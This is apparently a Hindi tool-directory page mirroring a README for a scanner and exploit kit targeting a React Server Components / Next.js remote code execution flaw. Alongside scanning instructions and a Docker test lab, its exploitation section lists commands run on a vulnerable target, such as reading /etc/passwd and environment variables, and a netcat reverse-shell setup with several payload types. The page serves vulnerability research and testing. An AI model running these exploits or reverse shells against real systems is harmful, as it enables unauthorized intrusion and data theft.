Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
समझौता संकेतक (IOC) प्रबंधनभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणखतरा खुफियासबडोमेन एनुमरेशनलर्निंग और शिक्षापेलोड डेवलपमेंटलैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

रिपॉजिटरी देखें
258 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

React2Shell एंटरप्राइज स्कैनर

उच्च-निष्ठा भेद्यता स्कैनर CVE-2025-55182 और CVE-2025-66478 के लिए - React Server Components / Next.js में रिमोट कोड निष्पादन भेद्यताएँ।

📖 विस्तृत तकनीकी विश्लेषण, शोषण तंत्र और IOC डेटा के लिए, SECURITY-RESEARCH.md देखें


⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इन उपकरणों का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं।


🚨 भेद्यता अवलोकन

CVEविवरणCVSS
CVE-2025-55182React Server Components असुरक्षित डिसीरियलाइज़ेशन RCE9.8 Critical
CVE-2025-66478Next.js Server Actions RCE9.8 Critical

प्रभावित पैकेज:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

फिक्स्ड वर्शन:

  • 19.0.1, 19.1.2, 19.2.1 (सभी पैकेजों के लिए)

✨ विशेषताएँ

  • बहु-लक्ष्य इनपुट: एकल URL, होस्ट फ़ाइलें, CIDR रेंज, IP रेंज
  • सबडोमेन एन्युमेरेशन: स्वचालित रूप से सबडोमेन खोजें
  • टेक्नोलॉजी फिंगरप्रिंटिंग: परीक्षण से पहले Next.js का पता लगाएं
  • सुरक्षित जांच मोड: कोड निष्पादन के बिना साइड-चैनल पहचान
  • RCE सत्यापन: अंकगणित-आधारित प्रूफ ऑफ कॉन्सेप्ट
  • IOC सहसंबंध: ज्ञात दुर्भावनापूर्ण बुनियादी ढांचे के विरुद्ध जांच
  • Phoenix सुरक्षा एकीकरण: Phoenix प्लेटफॉर्म पर निष्कर्ष अपलोड करें
  • समवर्ती स्कैनिंग: पैमाने के लिए मल्टी-थ्रेडेड

📦 स्थापना

uv का उपयोग करना (अनुशंसित)

root@kitploit:~
# कोई स्थापना आवश्यक नहीं - uv निर्भरताओं को संभालता है
uv run react2shell-scanner -u https://example.com

pip का उपयोग करना

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 उपयोग

बुनियादी स्कैनिंग

root@kitploit:~
# एकल URL
python3 react2shell-scanner -u https://example.com

# सुरक्षित मोड (RCE निष्पादन नहीं)
python3 react2shell-scanner -u https://example.com --safe-check

# होस्ट फ़ाइल से
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR रेंज
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# एकाधिक CIDR रेंज
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

उन्नत स्कैनिंग

root@kitploit:~
# सबडोमेन एन्युमेरेशन
python3 react2shell-scanner -u example.com --enumerate-subdomains

# कस्टम सबडोमेन वर्डलिस्ट
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# कस्टम पथ
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# फिंगरप्रिंटिंग छोड़ें (सब कुछ स्कैन करें)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# SSL अक्षम के साथ वर्बोज़
python3 react2shell-scanner -u https://example.com -k -v

Phoenix सुरक्षा एकीकरण

root@kitploit:~
# Phoenix पर निष्कर्ष अपलोड करें
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# डीबग मोड (पेलोड सहेजें)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# सभी परिणाम अपलोड करें (केवल भेद्यताएँ नहीं)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 कॉन्फ़िगरेशन

Phoenix सुरक्षा कॉन्फ़िग

.phoenix.config बनाएँ:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

या पर्यावरण चर का उपयोग करें:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 परीक्षण लैब

एक Docker-आधारित परीक्षण वातावरण शामिल है। त्वरित संदर्भ के लिए Lab-instructions-sample.md देखें।

root@kitploit:~
# लैब शुरू करें
cd test-lab/lab
docker-compose up -d

# सेवाएँ:
# - असुरक्षित: http://localhost:3011
# - पैच किया गया: http://localhost:3012

# असुरक्षित उदाहरण का परीक्षण करें (सुरक्षित साक्ष्य संग्रह)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# पैच किए गए उदाहरण का परीक्षण करें
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# पूर्ण डेमो चलाएँ
./test-and-demo.sh --full-demo

⚠️ नोट: शोषण कमांड (जैसे, exploit.py -c "whoami") वास्तविक RCE ट्रिगर करते हैं। केवल शोध उद्देश्यों के लिए स्थानीय Docker कंटेनरों पर ही उपयोग करें।

💻 शोषण उपकरण (exploit.py)

असुरक्षित लक्ष्यों पर कमांड निष्पादित करें। Python 3.11+ आवश्यक

स्थापना

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# या: pip3.11 install rich-click fake-useragent rich requests

कमांड निष्पादन उदाहरण

root@kitploit:~
# बुनियादी कमांड निष्पादन
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# आउटपुट: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# आउटपुट: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# आउटपुट: 99e28775bf80 (कंटेनर ID)

# सिस्टम एन्युमेरेशन
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# एप्लिकेशन टोही
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# आउटपुट: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# नेटवर्क जानकारी
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# प्रक्रिया एन्युमेरेशन
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

रिवर्स शेल (उन्नत)

root@kitploit:~
# Docker नेटवर्क गेटवे प्राप्त करें
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# सुनने वाला शुरू करें (दूसरे टर्मिनल में)
nc -lvnp 4444

# रिवर्स शेल लॉन्च करें
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# उपलब्ध पेलोड प्रकार: nc, nc-mkfifo, sh, bash, perl

शोषण विकल्प

📊 आउटपुट प्रारूप

कंसोल आउटपुट

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 ज्ञात दुर्भावनापूर्ण बुनियादी ढांचे से मेल खाता है
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

JSON आउटपुट

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 IOC सहसंबंध

स्कैनर में सक्रिय शोषण अभियानों से ज्ञात समझौता संकेतक (IOC) शामिल हैं:

  • 32 दुर्भावनापूर्ण IP payloads-exploits/iocs.csv से
  • हथियारबंद पेलोड payloads-exploits/weaponized-payloads से
  • विस्तारित IOC जिसमें डोमेन, URL, फ़ाइल हैश और क्रिप्टो वॉलेट शामिल हैं payloads-exploits/iocs_patterns.csv में

पहचाने गए IOC मैच उच्च गंभीरता के साथ चिह्नित किए जाते हैं।

IOC फ़ाइलें

फ़ाइलसामग्री
iocs.csvभू-स्थान डेटा के साथ 32 ज्ञात दुर्भावनापूर्ण IP

🛡️ पहचान विधियाँ

सुरक्षित साइड-चैनल जांच (--safe-check)

  • त्रुटि प्रतिक्रिया ट्रिगर करने वाला दूषित पेलोड भेजता है
  • लक्ष्य पर कोई कोड निष्पादन नहीं
  • पता लगाता है कि लक्ष्य में असुरक्षित डिसीरियलाइज़ेशन है या नहीं
  • निष्क्रिय टोही के लिए अनुशंसित

RCE अंकगणित जांच (डिफ़ॉल्ट)

  • पेलोड भेजता है जो echo $((41*271)) निष्पादित करता है
  • सत्यापित करता है कि प्रतिक्रिया में गणना परिणाम (11111) है
  • वास्तविक कोड निष्पादन क्षमता की पुष्टि करता है
  • केवल अधिकृत लक्ष्यों पर उपयोग करें

📁 परियोजना संरचना

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # मुख्य स्कैनर स्क्रिप्ट
├── cve-2025-66478-web-scan     # मूल स्कैनर संदर्भ
├── nuclei-rules                 # Nuclei टेम्पलेट
├── test-and-demo.sh            # परीक्षण स्वचालन
├── README.md                    # यह फ़ाइल
├── SECURITY-RESEARCH.md         # विस्तृत तकनीकी विश्लेषण
├── Lab-instructions-sample.md   # त्वरित लैब परीक्षण गाइड
├── payloads-exploits/
│   ├── iocs.csv                 # ज्ञात दुर्भावनापूर्ण IP
│   ├── iocs_patterns.csv        # विस्तारित IOC (डोमेन, URL, हैश)
│   ├── weaponized-payloads      # वास्तविक दुनिया के हमले के पेलोड
│   └── exploit-2025-55182       # कच्चा HTTP शोषण अनुरोध
└── test-lab/
    ├── exploit.py               # शोषण उपकरण
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # असुरक्षित Next.js ऐप
    │   └── patched/             # पैच किया गया Next.js ऐप
    └── packages/
        ├── vulnerable/          # असुरक्षित npm पैकेज
        └── patched/             # पैच किए गए npm पैकेज

🔗 संबंधित रिपॉजिटरी

रिपॉजिटरीउद्देश्य
react2shell-scanner-CVE-2025-55182लैब, स्कैनर और शोषण (यह रिपो)
react2shell-scanner-rce-react-nextवेब इंटरफ़ेस के साथ पूर्ण स्कैनर

⚠️ कानूनी अस्वीकरण

यह उपकरण अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। किसी भी लक्ष्य को स्कैन करने से पहले आपके पास स्पष्ट लिखित अनुमति होनी चाहिए। अनधिकृत स्कैनिंग कंप्यूटर अपराध कानूनों का उल्लंघन कर सकती है।

जिम्मेदारी से उपयोग करें:

  • केवल उन सिस्टम को स्कैन करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास प्राधिकरण है
  • अपने प्राधिकरण का दस्तावेजीकरण करें
  • उचित चैनलों के माध्यम से भेद्यताओं की रिपोर्ट करें
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें

📚 संदर्भ

  • CVE-2025-55182 सलाह
  • React सुरक्षा ब्लॉग
  • Next.js सुरक्षा सलाह GHSA-9qr9-h5gf-34mp
  • Vercel चेंजलॉग
  • Assetnote अनुसंधान

🙏 श्रेय

  • Assetnote सुरक्षा अनुसंधान टीम - मूल भेद्यता अनुसंधान
  • Chocapikk - शोषण विकास
  • Phoenix सुरक्षा - प्लेटफॉर्म एकीकरण

वेब को सुरक्षित बनाने के लिए काम कर रहे सुरक्षा शोधकर्ताओं द्वारा लाया गया।

टूल डाउनलोड करें
विकल्पविवरण
-u, --urlलक्ष्य URL (आवश्यक)
-c, --cmdनिष्पादित करने के लिए कमांड
-r, --reverseरिवर्स शेल मोड सक्षम करें
-l, --lhostरिवर्स शेल के लिए सुनने वाला होस्ट
-p, --lportरिवर्स शेल के लिए सुनने वाला पोर्ट
-P, --payloadपेलोड प्रकार: nc, nc-mkfifo, sh, bash, perl
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 10s)
iocs_patterns.csv
विस्तारित IOC: C2 डोमेन, ड्रॉपर URL, मैलवेयर हैश, Monero वॉलेट
weaponized-payloadsसक्रिय शोषण में देखे गए वास्तविक दुनिया के हमले के पेलोड
exploit-2025-55182शोषण के लिए कच्चा HTTP अनुरोध प्रारूप